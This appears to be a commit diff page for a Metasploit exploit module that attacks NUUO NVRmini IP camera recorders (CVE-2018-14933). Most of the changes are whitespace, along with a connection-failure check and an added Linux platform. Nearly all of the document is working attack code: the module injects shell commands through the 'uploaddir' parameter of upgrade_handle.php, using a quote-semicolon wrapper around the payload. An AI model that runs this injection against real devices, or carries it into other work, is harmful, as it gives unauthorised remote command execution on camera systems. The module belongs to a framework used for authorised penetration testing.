Update nuuo_nvrmini_upgrade_rce.rb
parent
3ac5096e1a
commit
c72065987b
|
@ -10,28 +10,28 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => 'NUUO NVRmini - upgrade_handle.php Remote Command Execution',
|
||||
'Description' => %q{
|
||||
'Name' => 'NUUO NVRmini - upgrade_handle.php Remote Command Execution',
|
||||
'Description' => %q{
|
||||
NUUO NVRmini ip camera web application. The upgrade_handle.php file is affected by the remote command execution vulnerability.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Berk Dusunur <@berkdusunur>',
|
||||
'numan turle <@numanturle>'
|
||||
],
|
||||
'References' =>
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'https://www.berkdusunur.net/2018/11/development-of-metasploit-module-after.html'],
|
||||
['CVE', '2018-14933'],
|
||||
['EDB', '45070']
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Payload' =>
|
||||
'Privileged' => false,
|
||||
'Payload' =>
|
||||
{
|
||||
'DisableNops' => true
|
||||
},
|
||||
'Platform' => %w{ unix win },
|
||||
'Platform' => %w{ unix win linux },
|
||||
'Arch' => ARCH_CMD,
|
||||
'Targets' => [ ['NUUO NVRmini', { }], ],
|
||||
'DisclosureDate' => 'Aug 04 2018',
|
||||
|
@ -41,13 +41,17 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
def check
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path.to_s, "upgrade_handle.php"),
|
||||
'vars_get' =>
|
||||
'uri' => normalize_uri(target_uri.path.to_s, "upgrade_handle.php"),
|
||||
'vars_get' =>
|
||||
{
|
||||
'cmd' => 'writeuploaddir',
|
||||
'uploaddir' => "';echo '#{Rex::Text.rand_text_alphanumeric(10..15)}';'"
|
||||
}
|
||||
})
|
||||
unless res
|
||||
vprint_error 'Connection failed'
|
||||
return CheckCode::Unknown
|
||||
end
|
||||
if res.code == 200 and res.body =~ /upload_tmp_dir/
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
@ -57,20 +61,14 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
def http_send_command(cmd)
|
||||
uri = normalize_uri(target_uri.path.to_s, "upgrade_handle.php")
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => uri,
|
||||
'vars_get' =>
|
||||
'method' => 'GET',
|
||||
'uri' => uri,
|
||||
'vars_get' =>
|
||||
{
|
||||
'cmd' => 'writeuploaddir',
|
||||
'uploaddir' => "';"+cmd+";'"
|
||||
}
|
||||
})
|
||||
unless res
|
||||
fail_with(Failure::Unknown, 'Failed to execute the command.')
|
||||
end
|
||||
res
|
||||
end
|
||||
|
||||
def exploit
|
||||
http_send_command(payload.encoded)
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue